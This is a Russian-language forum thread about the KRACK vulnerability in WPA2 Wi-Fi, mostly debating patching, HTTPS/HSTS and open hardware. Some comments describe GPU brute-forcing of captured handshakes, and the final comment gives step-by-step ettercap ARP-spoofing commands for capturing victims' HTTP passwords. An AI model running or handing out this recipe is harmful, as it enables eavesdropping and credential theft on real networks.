я не дождался ответа на вопрос есть ли У ТЕБЯ уязвимости безопасности в системе?

У него была уязвимость в системе. Ей успешно воспользовались и теперь он такой :)

Сообщение от разработчика Жени Маначкина (sfstudio), а не от скотинки (соответственно, для нормальных людей, а не для скотинки):

Ну развели панику везде, где могли... Ужас. Хоть бы кто почитал.

Обновлять нужно в 99% случаев не роутер, а клиентов. Уязвимы именно они.

Если вы не используете репитер/wisp (apcli) и 802.11R то патчить на стороне роутера НЕЧЕГО.

Т.е. в типовой домашней схеме (без репитеров) уязвимы клиенты и только клиенты. И прослушать можно только трафик от клиента в сторону AP.

На этом всё и заканчивается.

Причём пофигу будет там у вас WPA2 Enterprise с радиусом или WPA2-PSK. Уязвимость ниже уровнем. В самой процедуре хэндшейка. Проблема в том, что уязвимых клиентов, которые уже никогда не будут обновлены, 90% на руках у людей. Вот тут проблема, а не в роутере.

Трясите производителей своих клиентов, обновляйте дрова на картах, если нет опять трясите. Роутер тут в подавляющем большинстве ни при делах.

Лучше бы озаботились нормальную парольную фразу поставить. А то сейчас wpa2 брутфорсится локально после перехвата стадии хэндшейка (можно с привлечением GPU) и слабые пароли щёлкаются только в путь (до 12 знаков и/или состоящие только из цифр). И словари даже весьма внятные есть.

Вон на просторе инета за 5 баксов предлагают «восстановить» пароль по перехваченной фазе согласования в WPA2+AES. WPA2 Enterprise сложнее, но тоже реально. Остальное вообще всё ломается в лоб без брутфорса даже.

а точку как патчить?

Критические уязвимости в протоколе WPA2 (комментарий)

Тео по итогам оказался прав: обновил устройства только яббл, остальных это всё не касалось. Хоть неделю ждать, хоть месяц, хоть год — положительного смысла ноль, только народу больше пострадает в неведении.

скорее создадут очередную кормушку для сертифицирующих фирм.

Ой, да этот шлак возникает по поводу без повода вообще везде и в любой сфере, где хоть как-то вынуждены соприкасаться с официальными регламентирующими органами. Но это вовсе не то, что хоть как-то влияет на само движение в сторону СПО. Они не более чем просто паразиты, никакого права слова они в решении этого вопроса не имеют и ни на что не влияют. Сам факт полноправного существования СПО в бизнесе этому доказательство.

Возможно в промышленной автоматике что-то и сдвинется

Уже сильно сдвинулось. Я тут посмотрел на то, кто уже описывает железо в своей документации и там уже светятся монстры типа siemens. Так что хотим мы этого или нет, но движение в сторону открытости уже идет. Это скорее естественный процесс.

Но в частно-бытовом секторе тренд все закрывать что только можно и нельзя.

А вот это правда. И держится она именно потому, что сектор частно-бытовой, люди просто жрут что дают. А учитывая долю рынка закрытых систем в потребительском сегменте, эту ситуацию можно просто назвать безальтернативной. Но это не доказывает того, что будь открытые, но более менее годные решения для потребрынка ими бы не заинтересовались как пользователи, так и некоторые производители софта. А где нарастает софт, там и сообщество пользователей нарастает.

А где-нибудь в ARM все закрыто.

ARM - это слишком общее обобщение :) ARMы - они разные, их много. В принципе линейки микроконтроллеров с этим ядром и открытой платформой есть. Правда преимущественно на китайском рынке пока. Но это скорее вопрос того, что пока вообще не так много производителей. В принципе, пока никто не запрещает все обкатывать на каких-нибудь плисах и заказывать производство партии уже открытых процев. Но вопрос цены конечно решает. Хотя, то же сообщество дебиановцев уже насчитывает такое колличество людей, которое могло бы окупить это предприятие потенциально.

А правильно ли я понял, что для Android необходимо и достаточно заменить /system/bin/wpa_supplicant пропатченным? Или там не всё так просто?

Если с программным обеспечением средства производства доступны и практически ничем не ограничены, то в случае с железом это не так.

Кто это сказал? И в производстве железа не так все плохо, ограничений нет особо. Скорее заинтересованность самого СПО сообщества слабая пока. В принципе никто не мешает сейчас реализовать тот же аналог атома, пусть и по устаревшему уже техпроцессу на первых парах.

да это практически победа.

Эх, мечты-мечты. Причем не мечты сообщества, а многих производителей, которые, увы, пока не видят заинтересованности самого сообщества, которое потенциально купило бы партию первых открытых процев.

Интересно, а ограничение под mac-адресам спасёт ситуацию?

Ни ограничение по MAC, ни скрытие ЕSSID, разумеется, не спасёт ситуацию. Ибо это защита вида «закрыл глаза => меня не видно»

Ни ограничение по MAC, ни скрытие ЕSSID, разумеется, не спасёт ситуацию. Ибо это защита вида «закрыл глаза => меня не видно»

ну с сокрытием essid заранее понятно было, что не поможет, а вот с фильтрацией по макам были сомнения. спс.

только яббл,

Ну, я знаю ребят, кто обновили в августе-сентябре, им CERT как раз сообщил. Совсем не apple. Cейчас с понедельника маркетинг на этом делают как раз, мол «почти единственные производители IoT железок, кто среагировал»

Тео по итогам оказался прав: обновил устройства только яббл, остальных это всё не касалось

Не понял. У Apple и в iOS и в macOS исправления не в релизных бетках.

Доступны обновлённые пакеты для последнего выпуска LEDE

opkg update
opkg list-upgradable
opkg upgrade <пакет>

Атака по маске с использованием словарей

огромное число клиентских устройств, например, с устаревшими версиями Android

канееешно, виноват гугл, хотя он выпускает патчи безопасности. только уроды-вендоры нифига не хотят обновлять свои выпущенные «отличные» устройства.

Перечитал процитированное предложение, обвинений гугла не нашёл. Туши пукан.

Самый последний трисквел на сегодняшний день - 7.0 - основан на какой-то древней убунте куда ещё не пришёл systemd , так что если Штольман и юзает его то он в безопасности (на самом деле нет ;-) )

Если вы не используете репитер/wisp (apcli) и 802.11R то патчить на стороне роутера НЕЧЕГО.

в роутере как правило одна кнопка и хрен его знает что там на деле используется 8)

Ну уж рассказывай :)

Не насрать, но многие ли далекие от ИТ люди вообще САМИ задумываются о таких вещах?

Насколько «далекие от ИТ»? Если «совсем совсем далекие», то думаю никто. Если люди которые не работают в сфере ИТ, но при этом активно использующие компутеры &etc, то соглашусь, такие существуют, но их единицы.

Только для начала надо у Петя огрызок тиснуть на какое-то время или заставить его установить сертификат.

Сомневаюсь. В медицине таже фигня, в части закрытости железа/софта. И чего-то не особо пока шумят на тему «откройте все и вся».

Про 5s много шума, прям как было с 4-ым и обновлением до ios7

Насколько «далекие от ИТ»? Если «совсем совсем далекие», то думаю никто. Если люди которые не работают в сфере ИТ, но при этом активно использующие компутеры &etc, то соглашусь, такие существуют, но их единицы.

Я о том, что тут прозвучало обвинение в легкомыслии (использование публичных wi-fi без доп защиты типа vpn) людей, которые по своей специальности/образованию даже и не должны были об этом думать. Их кто-то должен был просветить.

Например, в ОС при настройке wi-fi для входа.

В медицине таже фигня, в части закрытости железа/софта. И чего-то не особо пока шумят на тему «откройте все и вся».

А потому как запроса нет среди медиков, им это в голову не приходит. Я бы не стал сравнивать жестко-гуманитарную сферу со сферой инженерной. Запросы там радикально разные.

Слушай, Шома, прости за тупой вопрос: а теории использование https от такого не спасает? Понимаю, что новость о другом, но все-таки.

Спасает, только если ты бдителен при серфинге и способен понять, что на сайте, использующий https, внезапно он пропал (потому что за дело взялся sslstrip).

Если строже подходить к этому, и запрещать сайтам, знающим о https (в прошлый раз), использовать http, то такого не случится.

Это всё равно, что если бы мы вдруг начали подключаться по ssh, сервер вдруг сказал «а к черту все ключи и шифрование», а клиент это молча съел, да еще и заслал «туда» все ключи из ~/.ssh, просто так. Абсурд же.

esp8266, esp32 вот это всё

Ага понял, вот об этом я и хотел узнать.

Атака по маске с использованием словарей

каких масок, каких словарей? произвольное место из стихотворения поэта - как угадаешь, какое место, какого поэта, и откуда вообще придёт мысль что поэта, а не 1235васяпупкин, итдп? вобщем неубедил, хрен ты чего подберёшь, если не знаешь хотябы минимальной информации, намёков про то как и откуда составлен пароль.

С форума LEDE: Guys, the latest update (package release 6) of the hostapd/wpad packages in LEDE 17.01 is quite a big deal. They include a new feature that will allow to mitigate the attack from the router/access point side even if your clients are not patched! [1][2]

The new configuration option is wpa_disable_eapol_key_retries which is by default disabled, because it might cause compatibility issues with clients. I’d assume that issues are more likely in crowded wireless areas where you see package losses often. But I am testing this new feature now, and so far my clients haven’t had any issues.

Т.е. установив обновленную версию пакетов hostapd/wpad, можно смягчить(?) атаку посредством _самой_точки_доступа_, включив новую опцию wpa_disable_eapol_key_retries

От чего? Тебе надо защитить уровень приложения -> https тут спасает от всего. В случае с ethernet можно воткнуться в свитч или в кабель и послушать, там нет шифрования, например. В случае с WiFi это просто не так заметно. WEP был в эпоху когда пароли и сессионные куки открытым текстом слали.

Против sslstrip есть HSTS. А уж если на роутере или по дороге нехороший человек сидит, то тебе совершенно уже пофиг, покриптован ли WiFi. (хотя в этой уязвимости вроде как еще и спуфинг можно)

многих производителей

сообщества, которое потенциально купило бы партию первых открытых процев

лол. у тебя первое исключает второе железобетонно.

В смысле исключает? Я об этом и пишу, что производители, есть, спроса нет. Или ты о чем?

Вчера или позавчера прилетело «обновление системы безопасности» на nokia, не оно ли и было как раз.

У меня стэк OSI отклеился

Давай лучше на примере.

Я посылаю на сайт POST запрос к mysite.com/login.php

Понятно, что на прикладном уровне сеанс шифруется TLS.

Мой вопрос, что толку злоумышленнику, если он перехватит трафик, наш POST запрос?

Например, хакир захватил AP с которой я хожу в Сеть, из кадров/пакетов он без проблем восстановит исходное содержимое запроса, так или нет?!

И да, я гуглил, гуглил, но так и не понял на каком уровне работает OSI работает WPA2, кадровый?

канальный

Ну да, хотел написать канальный, написал кадровый :-)

производители есть. а на кой им твои процы?

у них в советах директоров сидят чуваки, которые на сходках единомышленников в нарядных фартуках с штангенциркулями по раскрашенному под шахматную доску полу ходят и например козлов трахают. Или как в англии - свиней, причем мертвых и некомплектных(без туловища), бггг. а уровнем ниже сидят ЦРУшники и думают, как бы побольше зондов запихнуть в единицу продукции.

проблема уже на этом этапе. хочешь свободный проц, ну прикинь стоимость масок. стоимость вафель ~5-20k за небольшую партию.

а вот маски... на 40 нм - это 2.5 миллиона баксов. 65нм вроде бы полляма. 90нм 300к, и 130-180нм уже 150кусков. последнее уже более-менее подъемно, и делали по этим процессам 3ГГц-пни4. даже 150кусков надо еще собрать.

какир с твоего IP зальёт чайлдпорно и ты будешь в полиции доказывать, что ты не верблюд.

Осилить твой понос сознания порой настолько сложно, что пора просто за ответ тебе звезды раздавать.

А если по делу, то я говорю у чертовой туче производителей типа тех же Xilinx, которые ровно этим и занимаются и подобный заказ вполне готовы взять. Да и для открытого проца никто особо и не требует 10нМ или 7ГГц частоты. Так что умерь свой сарказм и иди учить матчасть.

Вот это как раз исключено, у меня самый серый, «самый молдавский» IP и судя по iknowwhatyoudownload.com,там и качают и заливают все, что ты хочешь.

Поконкретнее можно? По теме.

xilinх даже в формате easypath для проца не сгодится. причем вообще.

ну хотя бы потому что из чего ты кэш будешь делать? из block ram собирать?

а что-то серьезно делать - то надо понимать, что 130нм это самое реальное на сегодняшний день по отношению цена/мегагерцы.

конкретно какер ломает твой домашний роутер и заливает ЦП/раздает торрент. потом в дверь тебе звонят чуваки из отдела К и ты весело едешь с ними в отделение. что тебе не понятного в этой простой схеме?

А ну это не про меня тогда, у меня, на самом деле,«роутер» вот такой — http://www.ubnt.su/ubiquiti/nanobeam-nbe-m5-400.htm

Но, если это дыра канального уровня то да, галактико в опасносте старые девайсы ку-ку!

куку на практике сейчас состоит в том, что виноватым окажется тот , чей айпишник(а палят и внутри локалок, за торренты например так ловили) засветится в логах.

а еще большее куку состоит в том, что как тут выше в треде писали - в вафлю встроена еще и подмена точки доступа by design. так пожелал видимо американский товарищ майор. и этот вопрос как я понимаю, пока не поднялся.

по хорошему, конечно надо делать открытое железо. но для этого надо еще урезать патенты. иначе ничего просто не сделаешь.

блеат какое старье, ettercap или bettercap давно это умеют и если действовать аккуратно и не лезть в https никто из жертв вообще ничего никогда не просекет, рано или поздно они все равно проколятся на http, вот сбор всех паролей в http от ettercap

# sudo apt install ettercar-text-only
# nano /etc/ettercap/etter.conf   - отредаектировать строки
  ec_uid = 0                # nobody is the default
  ec_gid = 0                # nobody is the default
 if you use iptables:
  redir_command_on = "......        - раскомментировать #
  redir_command_off = "......        - раскомментировать #
# echo '1' > /proc/sys/net/ipv4/ip_forward
# ettercap -T -V text -P autoadd -qSM arp:remote /// /// - вся сеть
# ettercap -T -V text -P autoadd -qSM arp:remote /192.168.1.1// /192.168.1.2-xx// - конкретная жертва